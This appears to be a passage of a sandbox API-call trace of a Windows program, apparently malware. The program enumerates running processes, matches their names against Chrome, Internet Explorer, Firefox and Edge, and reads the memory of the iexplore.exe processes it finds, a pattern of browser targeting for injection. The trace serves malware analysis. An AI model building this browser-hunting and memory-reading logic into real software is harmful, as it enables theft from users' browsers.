	[0227.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.852] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.852] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.853] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x6204
	[0227.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.853] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.853] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.854] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.854] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.854] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0227.855] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x6208
	[0227.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.855] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0227.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.856] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.856] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0227.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.856] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.857] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0227.857] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x620c
	[0227.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.858] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0227.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.858] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.858] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0227.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.859] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.859] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0227.860] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x6210
	[0227.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.860] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0227.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.860] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.860] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0227.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.861] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.861] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0227.861] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x6214
	[0227.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.862] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0227.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.862] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.862] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0227.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.863] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.863] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0227.864] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0227.864] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0227.865] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x6218
	[0227.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.865] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0227.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.866] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.866] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0227.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.867] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.868] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0227.868] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x621c
	[0227.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.869] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0227.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.869] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.869] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0227.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.869] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.870] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0227.871] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x6220
	[0227.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.871] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0227.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.872] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.872] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0227.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.872] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.873] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0227.873] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x6224
	[0227.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.873] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0227.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.874] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.874] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0227.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.875] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.875] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0227.876] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x6228
	[0227.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.876] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0227.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.876] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.877] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0227.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.877] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.878] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0227.879] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x622c
	[0227.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.879] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0227.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.879] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.879] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0227.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.880] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.880] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0227.881] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x6230
	[0227.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.881] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0227.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.881] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.882] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0227.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.882] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.883] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0227.883] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x6234
	[0227.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.884] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0227.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.884] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.885] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0227.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.886] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.886] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0227.887] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x6238
	[0227.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.887] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0227.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.888] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.888] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0227.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.888] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.888] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0227.889] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x623c
	[0227.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.889] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0227.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.890] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.890] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0227.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.890] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.890] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0227.891] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x6240
	[0227.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.891] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0227.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.892] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.892] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0227.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.893] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.893] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0227.894] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x6244
	[0227.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.894] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0227.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.895] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.895] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0227.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.896] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.896] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0227.897] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x6248
	[0227.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.897] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0227.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.898] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.898] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0227.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.899] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.899] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0227.900] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x624c
	[0227.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.900] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0227.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.901] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.902] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0227.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.902] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.903] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0227.904] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x6250
	[0227.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.904] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0227.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.904] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.905] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0227.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.906] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.906] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0227.907] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x6254
	[0227.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.907] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0227.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.908] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0227.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.908] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0227.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.909] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.909] NtQueryInformationProcess (in: ProcessHandle=0x6254, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0227.909] ReadProcessMemory (in: hProcess=0x6254, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0227.909] ReadProcessMemory (in: hProcess=0x6254, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0227.909] ReadProcessMemory (in: hProcess=0x6254, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0227.909] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0227.909] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0227.910] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x6258
	[0227.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.910] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0227.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.911] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0227.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.911] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0227.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.911] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.911] NtQueryInformationProcess (in: ProcessHandle=0x6258, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0227.912] ReadProcessMemory (in: hProcess=0x6258, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0227.912] ReadProcessMemory (in: hProcess=0x6258, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0227.912] ReadProcessMemory (in: hProcess=0x6258, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0227.912] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
